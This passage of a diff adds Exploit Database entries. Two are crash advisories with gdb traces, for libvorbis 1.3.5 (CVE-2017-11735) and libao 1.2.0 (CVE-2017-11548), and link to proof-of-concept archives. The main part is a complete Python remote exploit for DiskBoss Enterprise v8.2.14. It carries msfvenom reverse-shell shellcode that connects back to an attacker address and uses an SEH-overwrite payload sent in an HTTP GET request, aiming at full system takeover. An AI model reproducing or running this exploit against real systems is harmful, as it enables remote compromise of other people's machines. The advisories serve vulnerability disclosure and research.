   0x00007ffff61752ca <+42>:mov    $0x1,%r12d
   0x00007ffff61752d0 <+48>:xor    %ebx,%ebx
   0x00007ffff61752d2 <+50>:jmp    0x7ffff61752df <vorbis_block_clear+63>
   0x00007ffff61752d4 <+52>:nopl   0x0(%rax)
   0x00007ffff61752d8 <+56>:add    $0x1,%ebx
   0x00007ffff61752db <+59>:add    $0x1,%r12d
   0x00007ffff61752df <+63>:movslq %ebx,%rax
 ---Type <return> to continue, or q <return> to quit---q
 Quit
 (gdb) i r
 rax            0x22
 rbx            0x61fca06421664
 rcx            0x00
 rdx            0x7ffff7ba6778140737349576568
 rsi            0x00
 rdi            0x80128
 rbp            0x7fffffffd4700x7fffffffd470
 rsp            0x7fffffffd4000x7fffffffd400
 r8             0x746e656d75636f008389754676633104128
 r9             0x6143506374224
 r10            0x7fffffffd1f0140737488343536
 r11            0x7ffff61752a0140737322111648
 r12            0x6128506367312
 r13            0x00
 r14            0x6205606423904
 r15            0x7ffff7bcf146140737349742918
 rip            0x7ffff61752c00x7ffff61752c0 <vorbis_block_clear+32>
 eflags         0x202[ IF ]
 cs             0x3351
 ss             0x2b43
 ds             0x00
 es             0x00
 fs             0x00
 ---Type <return> to continue, or q <return> to quit---
 gs             0x00
 (gdb) ni
 Program received signal SIGSEGV, Segmentation fault.
 __GI___libc_free (mem=0x80) at malloc.c:2929
 2929malloc.c: No such file or directory.
 (gdb) bt
 #0  __GI___libc_free (mem=0x80) at malloc.c:2929
 #1  0x00007ffff61752c5 in vorbis_block_clear ()
   from /usr/local/lib/libvorbis.so.0
 #2  0x00007ffff65ac5ae in splt_ogg_v_free (oggstate=0x61fca0) at ogg.c:162
 #3  0x00007ffff65ace0b in splt_ogg_info (in=<optimized out>, 
    state=state@entry=0x60ddb0, error=error@entry=0x7fffffffdbf0) at ogg.c:545
 #4  0x00007ffff65acf75 in splt_ogg_get_info (state=state@entry=0x60ddb0, 
    file_input=<optimized out>, error=error@entry=0x7fffffffdbf0) at ogg.c:108
 #5  0x00007ffff65ae6c7 in splt_pl_init (state=0x60ddb0, error=0x7fffffffdbf0)
    at ogg.c:1482
 #6  0x00007ffff7bcac16 in splt_tp_get_original_tags_and_append (
    error=0x7fffffffdbf0, state=0x60ddb0) at tags_parser.c:545
 #7  splt_tp_process_original_tags_variable (tpu=tpu@entry=0x61f800, 
    state=state@entry=0x60ddb0, error=error@entry=0x7fffffffdbf0, 
    set_original_tags=1) at tags_parser.c:514
 #8  0x00007ffff7bcb4d1 in splt_tp_process_tag_variable (error=0x7fffffffdbf0, 
    state=0x60ddb0, tpu=0x61f800, end_paranthesis=0x7ffff7bcf14c "]", 
    tag_variable_start=0x7ffff7bcf146 "o,@N=1]") at tags_parser.c:363
 #9  splt_tp_process_tags (error=0x7fffffffdbf0, state=0x60ddb0, tpu=0x61f800, 
    tags=0x7ffff7bcf143 "%[@o,@N=1]") at tags_parser.c:293
 #10 splt_tp_put_tags_from_string (state=state@entry=0x60ddb0, 
    tags=tags@entry=0x7ffff7bcf143 "%[@o,@N=1]", 
    error=error@entry=0x7fffffffdbf0) at tags_parser.c:192
 ---Type <return> to continue, or q <return> to quit---
 #11 0x00007ffff7bbb4f3 in mp3splt_split (state=state@entry=0x60ddb0)
    at mp3splt.c:1232
 #12 0x0000000000403320 in main (argc=<optimized out>, 
    orig_argv=<optimized out>) at mp3splt.c:872
 (gdb) 
 --------------------
 int vorbis_block_clear(vorbis_block *vb){
 int i;
 vorbis_block_internal *vbi=vb->internal;
 _vorbis_block_ripcord(vb);
 if(vb->localstore)_ogg_free(vb->localstore);  <========
 if(vbi){
   for(i=0;i<PACKETBLOBS;i++){
     oggpack_writeclear(vbi->packetblob[i]);
     if(i!=PACKETBLOBS/2)_ogg_free(vbi->packetblob[i]);
   }
   _ogg_free(vbi);
 }
 memset(vb,0,sizeof(*vb));
 return(0);
 }
 POC:
 libvorbis_1.3.5_null_pointer_dereference.ogg
 CVE:
 CVE-2017-11735
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42399.zip
--- a/platforms/linux/dos/42400.txt
+++ b/platforms/linux/dos/42400.txt
@ -0,0 +1,62 @@
 libao memory corruption vulnerability
 ================
 Author : qflb.wu
 ===============
 Introduction:
 =============
 Libao is a cross-platform audio library that allows programs to output audio using a simple API on a wide variety of platforms.
 Affected version:
 =====
 1.2.0
 Vulnerability Description:
 ==========================
 the _tokenize_matrix function in audio_out.c in Xiph.Org libao 1.2.0 can cause a denial of service(memory corruption) via a crafted mp3 file.
 I found this bug when I test mpg321 0.3.2 which used the libao library.
 ./mpg321 libao_1.2.0_memory_corruption.mp3
 ----debug info:----
 Program received signal SIGSEGV, Segmentation fault.
 _int_malloc (av=av@entry=0x7ffff6f7f760 <main_arena>, bytes=bytes@entry=3)
    at malloc.c:3740
 3740malloc.c: No such file or directory.
 (gdb) bt
 #0  _int_malloc (av=av@entry=0x7ffff6f7f760 <main_arena>, bytes=bytes@entry=3)
    at malloc.c:3740
 #1  0x00007ffff6c442cc in __libc_calloc (n=<optimized out>, 
    elem_size=<optimized out>) at malloc.c:3219
 #2  0x00007ffff728e189 in _tokenize_matrix () from /usr/local/lib/libao.so.4
 #3  0x00007ffff728e607 in _matrix_to_channelmask ()
   from /usr/local/lib/libao.so.4
 #4  0x00007ffff72906f2 in _open_device () from /usr/local/lib/libao.so.4
 #5  0x000000000040a6aa in open_ao_playdevice (header=header@entry=0x624af8)
    at ao.c:411
 #6  0x0000000000407e50 in output (data=<optimized out>, header=0x624af8, 
    pcm=0x627f44) at mad.c:974
 #7  0x00007ffff749a85c in run_sync (decoder=0x7fffffffbc40) at decoder.c:439
 #8  0x00007ffff749ab38 in mad_decoder_run (
    decoder=decoder@entry=0x7fffffffbc40, 
    mode=mode@entry=MAD_DECODER_MODE_SYNC) at decoder.c:557
 #9  0x0000000000403d5d in main (argc=<optimized out>, argv=<optimized out>)
    at mpg321.c:1092
 (gdb) 
 POC:
 libao_1.2.0_memory_corruption.mp3
 CVE:
 CVE-2017-11548
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42400.zip
--- a/platforms/windows/remote/42395.py
+++ b/platforms/windows/remote/42395.py
@ -0,0 +1,117 @@
 #!/usr/bin/env python
 # Exploit Title: DiskBoss Enterprise v8.2.14 Remote buffer overflow
 # Date: 2017-07-30
 # Exploit Author: Ahmad Mahfouz
 # Author Homepage: www.unixawy.com
 # Vendor Homepage: http://www.diskboss.com/
 # Software Link: http://www.diskboss.com/setups/diskbossent_setup_v8.2.14.exe
 # Version: v8.2.14
 # Tested on: Windows 7 SP1 x64
 # Category; Windows Remote Exploit
 # Description: DiskBoss Enterprise with management web-console enabled can lead to full system takeover.
 import socket,sys
 print "-----------------------------------------"
 print "- DiskBoss Enterprise v8.2.14 TakeOver  -"
 print "- Tested on windows 7 x64               -"
 print "- by @eln1x                             -"
 print "-----------------------------------------"
 try:
    target = sys.argv[1]
 except:
    print "Usage ./DB_E_v8.2.14.py 192.168.1.2"
    sys.exit(1)
 port = 80
 #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.72.136 LPORT=443 EXITFUN=none -e x86/alpha_mixed -f python
 shellcode  = "\x89\xe0\xdd\xc0\xd9\x70\xf4\x58\x50\x59\x49\x49\x49"
 shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
 shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
 shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
 shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x6d\x38\x4c"
 shellcode += "\x42\x35\x50\x77\x70\x67\x70\x65\x30\x4b\x39\x6a\x45"
 shellcode += "\x36\x51\x59\x50\x61\x74\x6e\x6b\x70\x50\x56\x50\x4e"
 shellcode += "\x6b\x30\x52\x64\x4c\x6c\x4b\x71\x42\x72\x34\x6e\x6b"
 shellcode += "\x73\x42\x36\x48\x34\x4f\x58\x37\x70\x4a\x54\x66\x36"
 shellcode += "\x51\x6b\x4f\x4c\x6c\x57\x4c\x43\x51\x61\x6c\x44\x42"
 shellcode += "\x76\x4c\x45\x70\x69\x51\x78\x4f\x46\x6d\x65\x51\x59"
 shellcode += "\x57\x6d\x32\x4c\x32\x33\x62\x43\x67\x6c\x4b\x36\x32"
 shellcode += "\x74\x50\x4e\x6b\x61\x5a\x55\x6c\x4c\x4b\x30\x4c\x46"
 shellcode += "\x71\x43\x48\x68\x63\x67\x38\x55\x51\x6a\x71\x66\x31"
 shellcode += "\x4c\x4b\x42\x79\x37\x50\x55\x51\x6b\x63\x4e\x6b\x67"
 shellcode += "\x39\x66\x78\x6a\x43\x67\x4a\x37\x39\x6c\x4b\x37\x44"
 shellcode += "\x4c\x4b\x77\x71\x6e\x36\x36\x51\x49\x6f\x4c\x6c\x7a"
 shellcode += "\x61\x38\x4f\x36\x6d\x66\x61\x6a\x67\x55\x68\x59\x70"
 shellcode += "\x42\x55\x4a\x56\x76\x63\x43\x4d\x5a\x58\x37\x4b\x63"
 shellcode += "\x4d\x56\x44\x51\x65\x7a\x44\x43\x68\x6e\x6b\x31\x48"
 shellcode += "\x37\x54\x56\x61\x58\x53\x51\x76\x6e\x6b\x46\x6c\x62"
 shellcode += "\x6b\x6e\x6b\x61\x48\x65\x4c\x46\x61\x5a\x73\x4e\x6b"
 shellcode += "\x44\x44\x6c\x4b\x63\x31\x5a\x70\x4f\x79\x61\x54\x37"
 shellcode += "\x54\x34\x64\x31\x4b\x43\x6b\x33\x51\x66\x39\x61\x4a"
 shellcode += "\x70\x51\x79\x6f\x69\x70\x71\x4f\x31\x4f\x30\x5a\x6c"
 shellcode += "\x4b\x45\x42\x48\x6b\x4c\x4d\x31\x4d\x61\x78\x34\x73"
 shellcode += "\x57\x42\x75\x50\x43\x30\x73\x58\x72\x57\x61\x63\x67"
 shellcode += "\x42\x61\x4f\x73\x64\x61\x78\x50\x4c\x64\x37\x51\x36"
 shellcode += "\x34\x47\x69\x6f\x58\x55\x6d\x68\x5a\x30\x36\x61\x75"
 shellcode += "\x50\x53\x30\x64\x69\x4b\x74\x61\x44\x66\x30\x35\x38"
 shellcode += "\x66\x49\x4d\x50\x32\x4b\x65\x50\x39\x6f\x49\x45\x62"
 shellcode += "\x70\x50\x50\x56\x30\x42\x70\x67\x30\x70\x50\x67\x30"
 shellcode += "\x52\x70\x70\x68\x78\x6a\x36\x6f\x69\x4f\x49\x70\x69"
 shellcode += "\x6f\x4b\x65\x6f\x67\x62\x4a\x35\x55\x51\x78\x6b\x70"
 shellcode += "\x6e\x48\x67\x38\x6b\x38\x51\x78\x73\x32\x63\x30\x76"
 shellcode += "\x61\x4f\x4b\x4f\x79\x6a\x46\x33\x5a\x56\x70\x63\x66"
 shellcode += "\x71\x47\x71\x78\x5a\x39\x4c\x65\x31\x64\x35\x31\x39"
 shellcode += "\x6f\x78\x55\x6b\x35\x4b\x70\x52\x54\x64\x4c\x59\x6f"
 shellcode += "\x42\x6e\x73\x38\x44\x35\x5a\x4c\x70\x68\x5a\x50\x6f"
 shellcode += "\x45\x4e\x42\x73\x66\x59\x6f\x4a\x75\x30\x68\x35\x33"
 shellcode += "\x50\x6d\x32\x44\x75\x50\x4f\x79\x69\x73\x73\x67\x70"
 shellcode += "\x57\x32\x77\x55\x61\x49\x66\x51\x7a\x64\x52\x61\x49"
 shellcode += "\x70\x56\x7a\x42\x49\x6d\x70\x66\x4b\x77\x33\x74\x66"
 shellcode += "\x44\x67\x4c\x77\x71\x53\x31\x6e\x6d\x37\x34\x65\x74"
 shellcode += "\x34\x50\x39\x56\x73\x30\x33\x74\x62\x74\x52\x70\x61"
 shellcode += "\x46\x33\x66\x76\x36\x30\x46\x36\x36\x62\x6e\x32\x76"
 shellcode += "\x50\x56\x66\x33\x43\x66\x71\x78\x71\x69\x5a\x6c\x77"
 shellcode += "\x4f\x4c\x46\x4b\x4f\x5a\x75\x6e\x69\x59\x70\x62\x6e"
 shellcode += "\x30\x56\x67\x36\x6b\x4f\x30\x30\x31\x78\x55\x58\x6c"
 shellcode += "\x47\x45\x4d\x71\x70\x59\x6f\x6b\x65\x4d\x6b\x38\x70"
 shellcode += "\x38\x35\x6e\x42\x76\x36\x50\x68\x69\x36\x6f\x65\x6d"
 shellcode += "\x6d\x6d\x4d\x6b\x4f\x6b\x65\x47\x4c\x36\x66\x63\x4c"
 shellcode += "\x75\x5a\x4f\x70\x6b\x4b\x4b\x50\x50\x75\x57\x75\x6f"
 shellcode += "\x4b\x43\x77\x62\x33\x70\x72\x32\x4f\x50\x6a\x75\x50"
 shellcode += "\x42\x73\x6b\x4f\x39\x45\x41\x41"
 payload = shellcode
 payload += 'A' * (2492   - len(payload))
 payload += '\xEB\x10\x90\x90' # NSEH: First Short JMP 
 payload += '\xCA\xA8\x02\x10' # SEH : POP EDI POP ESI RET 04  libpal.dll
 payload += '\x90' * 10
 payload += '\xE9\x25\xBF\xFF\xFF' # Second JMP to ShellCode 
 payload += 'D' * (5000-len(payload))
 s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 try:
    s.connect((target,port))
    print "[*] Connection Success."
 except:
    print "Connction Refused %s:%s" %(target,port)
    sys.exit(2)
 packet =  "GET /../%s HTTP/1.1\r\n" %payload
 packet += "Host: 4.2.2.2\r\n"
 packet += "Connection: keep-alive\r\n"
 packet += "Paragma: no-cache\r\n"
 packet += "Cahce-Control: no-cache\r\n"
 packet += "User-Agent: H4X0R\r\n"
 packet += "Referer: http://google.com\r\n"
 packet += "\r\n"
 print "[*] Get nt authority or die hard"
 s.send(packet)
 s.close()